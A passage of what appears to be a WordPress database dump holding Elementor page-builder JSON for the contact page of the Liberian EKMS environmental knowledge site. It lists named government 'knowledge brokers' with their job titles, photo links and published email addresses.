href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24024,3522,'_elementor_edit_mode','builder'),(24025,3522,'_elementor_template_type','wp-page'),(24026,3522,'_elementor_version','3.0.16'),(24027,3522,'_wp_page_template','default'),(24028,3522,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br 